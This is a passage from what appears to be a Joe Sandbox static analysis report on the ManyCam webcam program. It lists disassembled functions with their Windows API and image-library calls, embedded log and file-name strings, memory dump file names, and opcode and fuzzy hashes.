                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$Base::Concurrency::details::$PolicySchedulerwcslen$ContextIdentityListQueueWork_invalid_parameter_noinfo_snwprintfwcscatwcscpy
                                                                                                                                            • String ID: %s files (%s)$*.%s$*.%s$;*.%s$;*.%s
                                                                                                                                            • API String ID: 3673500439-2222090975
                                                                                                                                            • Opcode ID: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
                                                                                                                                            • Instruction ID: 0f1205feb10db953e557daecc0f66cfc6334ceda2ae244769a0a321528e6ad92
                                                                                                                                            • Opcode Fuzzy Hash: 410b57a6a7f9a888242e909b12c55668fef034fc55ece74735e624549ad644eb
                                                                                                                                            • Instruction Fuzzy Hash: 7BC12F71D00208DBDB14EBA5E892BEEB775AF54308F10417EF116B72D1DB385A48CB99
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041A415
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041A437
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041A455
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041A47D
                                                                                                                                              • Part of subcall function 00472C60: _wfopen_s.MSVCR80 ref: 00472CBE
                                                                                                                                              • Part of subcall function 00472C60: fclose.MSVCR80 ref: 00472CDF
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                              • Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047314B
                                                                                                                                              • Part of subcall function 004730D0: _DebugHeapAllocator.LIBCPMTD ref: 0047316D
                                                                                                                                            • ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,?,00000000,?,0053E990,?,?,?,?,?,\class.xml,?,?,?,data\images\), ref: 0041A530
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$Image@@Load@_wfopen_sfclose
                                                                                                                                            • String ID: 8S$P$\class.xml$data\images\$icon$icon_and_text$style$S
                                                                                                                                            • API String ID: 255584289-693003568
                                                                                                                                            • Opcode ID: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
                                                                                                                                            • Instruction ID: 810976337b1479ad00da3f975604671f65968c870661c51cbc195e462080606e
                                                                                                                                            • Opcode Fuzzy Hash: 603b225bfe0989b9d3390ef585aae42c8b49bc1da2bbc25a9b3d303a95ec7668
                                                                                                                                            • Instruction Fuzzy Hash: 4BD16EB0D012189BDB14DB95CD92BEDBBB4BF18304F10819EE14A77281DB746E85CF9A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83
                                                                                                                                            • DefWindowProcA.USER32(?,?,?), ref: 00B96394
                                                                                                                                            • SetCapture.USER32 ref: 00B965F8
                                                                                                                                            • ReleaseCapture.USER32 ref: 00B96616
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00B9662E
                                                                                                                                            • DefWindowProcA.USER32(?,?,?), ref: 00B966B4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CaptureProc$ClientLongRectRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 81580808-0
                                                                                                                                            • Opcode ID: f7c7ac7ecadc59b9c37d91d66d2000a400560e5ce704e074679cc101f44bff6f
                                                                                                                                            • Instruction ID: 307f802d2db86b9a777ac61f12f976e7a504b723aae1109b80eca2661e159216
                                                                                                                                            • Opcode Fuzzy Hash: f7c7ac7ecadc59b9c37d91d66d2000a400560e5ce704e074679cc101f44bff6f
                                                                                                                                            • Instruction Fuzzy Hash: 7AB1D2715083029FDB24CF64C898BAFBBE5EBC8304F11496EF98597251D774E845CB92
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBEFD
                                                                                                                                            • InterlockedCompareExchange.KERNEL32(00BED220,?,00000000), ref: 00BDBF06
                                                                                                                                            • _amsg_exit.MSVCR80 ref: 00BDBF24
                                                                                                                                            • _initterm_e.MSVCR80 ref: 00BDBF3F
                                                                                                                                            • _initterm.MSVCR80 ref: 00BDBF5B
                                                                                                                                            • InterlockedExchange.KERNEL32(00BED220,00000000), ref: 00BDBF70
                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBFC1
                                                                                                                                            • InterlockedCompareExchange.KERNEL32(00BED220,00000001,00000000), ref: 00BDBFCB
                                                                                                                                            • _amsg_exit.MSVCR80 ref: 00BDBFDD
                                                                                                                                            • _decode_pointer.MSVCR80(?,?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDBFF1
                                                                                                                                            • _decode_pointer.MSVCR80(?,00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC000
                                                                                                                                            • _encoded_null.MSVCR80(00000001,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC012
                                                                                                                                            • _decode_pointer.MSVCR80(?,?,00BDC0CA,00000001,?,?,00BE3960,00000010,00BDC196,?), ref: 00BDC022
                                                                                                                                            • free.MSVCR80 ref: 00BDC02F
                                                                                                                                            • _encoded_null.MSVCR80(?,00BE3960,00000010,00BDC196,?), ref: 00BDC036
                                                                                                                                            • InterlockedExchange.KERNEL32(00BED220,00000000), ref: 00BDC053
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExchangeInterlocked$_decode_pointer$CompareSleep_amsg_exit_encoded_null$_initterm_initterm_efree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2174737765-0
                                                                                                                                            • Opcode ID: 771b923fa2d5699d359c5fe235b1fa28830183841917b08d1fb3a6a8507b2e84
                                                                                                                                            • Instruction ID: 789492e6c99a749125446639d112f27dfd02712bcb19e53928187c46863079de
                                                                                                                                            • Opcode Fuzzy Hash: 771b923fa2d5699d359c5fe235b1fa28830183841917b08d1fb3a6a8507b2e84
                                                                                                                                            • Instruction Fuzzy Hash: 19419931509246DFC620AF65EC94A2AFFE4EB48314F2104ABF6459B2A1FFB1D841DF91
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
                                                                                                                                              • Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B84DB
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000030,?,?,?,?,?,?,?,7EC02BB4), ref: 004B84E2
                                                                                                                                              • Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
                                                                                                                                              • Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852
                                                                                                                                              • Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F
                                                                                                                                            Strings
                                                                                                                                            • Couldn't find the graph %s!, xrefs: 004B86E7
                                                                                                                                            • Creating frame grabbing graph for file %s, xrefs: 004B856B
                                                                                                                                            • Failed creating graph with hr=%X; preparing to clean up., xrefs: 004B8697
                                                                                                                                            • Creating frame grabbing graph for camera %s, xrefs: 004B84C0
                                                                                                                                            • Setting current pos for the graph %s, xrefs: 004B8616
                                                                                                                                            • Setting graph state %d, xrefs: 004B8655
                                                                                                                                            • AppModel pointer is NULL! Returning E_FAIL., xrefs: 004B8472
                                                                                                                                            • Destroying the graph., xrefs: 004B8725
                                                                                                                                            • CManyCamGraphMgr::CreateGraph, xrefs: 004B8448
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapclock$??2@fflushfwprintf
                                                                                                                                            • String ID: AppModel pointer is NULL! Returning E_FAIL.$CManyCamGraphMgr::CreateGraph$Couldn't find the graph %s!$Creating frame grabbing graph for camera %s$Creating frame grabbing graph for file %s$Destroying the graph.$Failed creating graph with hr=%X; preparing to clean up.$Setting current pos for the graph %s$Setting graph state %d
                                                                                                                                            • API String ID: 1778695617-1153812090
                                                                                                                                            • Opcode ID: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
                                                                                                                                            • Instruction ID: f3cb85e83180b36cfd0b303413b5ba2857901d6173e86f69feec068597868732
                                                                                                                                            • Opcode Fuzzy Hash: f1e7f66eff02cda7a9ed3db3bcb49d45f39b49662cdf193da7ba6901c3f1654f
                                                                                                                                            • Instruction Fuzzy Hash: FBC11B75D00209AFDB04DF99CC92BEEB7B4AF48308F14411EF5167B292DB786A05CB69
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00506312
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00506336
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00506352
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0050636E
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6
                                                                                                                                            • ??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,7EC02BB4), ref: 005063A1
                                                                                                                                            • ??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000002,7EC02BB4), ref: 005063B5
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                              • Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
                                                                                                                                              • Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF
                                                                                                                                            • memcpy.MSVCR80(?,?,?,7EC02BB4), ref: 0050646C
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?,?,anonymous_type,?,?,mask_reader_ver,?,?,mask_type,?,?,?,?,7EC02BB4), ref: 0050652C
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?,?,?,?,?,7EC02BB4), ref: 0050653E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$??3@Image@@$memcpy
                                                                                                                                            • String ID: anonymous_type$mask_reader_ver$mask_type$properties
                                                                                                                                            • API String ID: 3418783136-1683271502
                                                                                                                                            • Opcode ID: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
                                                                                                                                            • Instruction ID: 830ff7d4bb77275050dcf287e18c53aa9cee5c96830a24d37f20f8f55580aab9
                                                                                                                                            • Opcode Fuzzy Hash: ea6c7d0e71fb220edab34224d6aa0e07e57cb9ccd2759369dc2a5b15c5864e21
                                                                                                                                            • Instruction Fuzzy Hash: 8891F7B1E002489FDB04DFA8D896BEEBBB5BF88304F10816DE419A7381DB345A45CF91
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B94CA7
                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,0004001F,00000000,?,00000000), ref: 00B94D0E
                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B94D4B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateEnumOpen
                                                                                                                                            • String ID: Left$Top
                                                                                                                                            • API String ID: 1535768306-3873733008
                                                                                                                                            • Opcode ID: 4c0648dfdea83312e0bfb7d06edf043e98eee5851714373c65693d9a76f06aab
                                                                                                                                            • Instruction ID: 6e87f522736512c6fe8a7eae09d9f516ea508e247532cff44db2d58015d81c91
                                                                                                                                            • Opcode Fuzzy Hash: 4c0648dfdea83312e0bfb7d06edf043e98eee5851714373c65693d9a76f06aab
                                                                                                                                            • Instruction Fuzzy Hash: D651C3B2104245AFDB20DB64DC90EBBB7EDFBC8304F04496DF69587251E771AD0987A2
                                                                                                                                            APIs
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144AB
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144B6
                                                                                                                                            • ?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?,?), ref: 00514559
                                                                                                                                            • ?IncreaseBpp@CxImage@@QAE_NK@Z.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 00514563
                                                                                                                                            • ?AlphaCreate@CxImage@@QAE_NXZ.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 0051456B
                                                                                                                                            • ?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?), ref: 005145B1
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 005145DC
                                                                                                                                            • ?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 0051463E
                                                                                                                                            • ?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF), ref: 00514651
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image@@$Resample@Save@V1@@$AllocatorAlphaBpp@Create@DebugHeapHeight@IncreaseWidth@
                                                                                                                                            • String ID: %s\%d.png$%s\%d.png$352x288$640x480
                                                                                                                                            • API String ID: 2860891125-2440275166
                                                                                                                                            • Opcode ID: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
                                                                                                                                            • Instruction ID: acc42daae56a842fc35e0990e2763de5810e809cf3d34599ed660b5ee8a323ea
                                                                                                                                            • Opcode Fuzzy Hash: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
                                                                                                                                            • Instruction Fuzzy Hash: 5A6107B5E00209AFDB04EF99D892AEEBBB5FF88300F108529F515B7291DB746941CF94
                                                                                                                                            APIs
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000000), ref: 00B9CAF6
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000000,00000000), ref: 00B9CB12
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(?,00000000,00000000), ref: 00B9CB1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@
                                                                                                                                            • String ID: II*$r+b
                                                                                                                                            • API String ID: 1033339047-1110506143
                                                                                                                                            • Opcode ID: 2b274b65d65becda1309347fc64fad1e50ab1d8a2a37c986607af837f9e5be9b
                                                                                                                                            • Instruction ID: 0c2a133c2c35482d06dad41d4a2fc286bc70289c90cc079c61663bb460c097bd
                                                                                                                                            • Opcode Fuzzy Hash: 2b274b65d65becda1309347fc64fad1e50ab1d8a2a37c986607af837f9e5be9b
                                                                                                                                            • Instruction Fuzzy Hash: FCC18070348300ABDB14DF28C892B2FBBE5EBC9740F50086DF6869B391DBB5D9458796
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$_wfopen_sfclose
                                                                                                                                            • String ID: base_class$class$name$prop$val
                                                                                                                                            • API String ID: 1905607448-2961531382
                                                                                                                                            • Opcode ID: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
                                                                                                                                            • Instruction ID: 751db2e67e60f486d96aaf90422ccf13f7de2e4e99e3856fc400571b524def08
                                                                                                                                            • Opcode Fuzzy Hash: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
                                                                                                                                            • Instruction Fuzzy Hash: 47C14C70901258DEDB14EBA4CD55BEEBBB4BF50308F10819EE14A67292DB781F88CF95
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
